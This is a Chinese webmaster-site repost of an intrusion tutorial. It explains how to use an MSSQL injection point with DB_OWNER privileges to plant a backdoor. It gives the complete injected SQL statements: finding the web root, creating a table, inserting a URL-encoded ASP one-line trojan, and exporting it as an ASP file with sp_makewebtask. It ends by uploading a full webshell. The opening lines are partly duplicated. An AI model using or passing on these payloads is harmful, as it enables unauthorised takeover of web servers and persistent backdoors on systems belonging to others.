mssql注入 MSSQL下拿WEBSEHLL
码,再用用密码登陆网站的管理后台这种比较笨的利用方法.当MSSQL注入点为DB-ONWER权限时,而同时
MSSQL的注入是一种非常复杂和有效的入侵技术,其作用当然不仅仅只是通过注入点得到管理用的密 码,再用用密码登陆网站的管理后台这种比较笨的利用方法.当MSSQL注入点为DB-ONWER权限时,而同时数据库 和WEB是在同一台主机上, 满足这二个条件时,可能通过得到WEB路径,再将一字话木马写入一个表,再利用 MSSQL语句将其导出为一个脚本文件的方法得到一个后门mssql注入,再上传大木马的方法得到WEBSEHLL. 第一步:确定网站的WEB路径,通过DIRTREE逐个查看硬盘及文件夹查找WEB目录 第二步.得到WEB路径后,建一个表.字段类型为CHAR长度为255,这个表将来用作插入一句话木马,使用语句 ;create table pcguest(pc char(255));-- 第三步,将一句话木马插入表中,使用 ;insert into pcguest(pc) values ('')-- 其中就是一句话木马,但是由于是在链接地址提交的,所以涉及到字符转 换问题,将一句话木马中的< > %" 字符转换成unicode格式,,如修改后的一句话木马代码为 %3c%25execute request(%22p%22)%25%3e 完整的MSSQL语句为 ;insert into pcguest(pc) values ('%3c%25execute request(%22p%22)%25%3e');-- 第四步,将表导出为一个ASP的文件 ;execute sp_makewebtask @outputfile='E:InetpubwwwrootPC.ASP',@query='select pc from pcguest';-- 最后在网页上连接ASP一句话木马上传大马,即拿到WEBSEHLL 来源于 :B.B.S.T信息安全团队 (编辑:92站长网) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |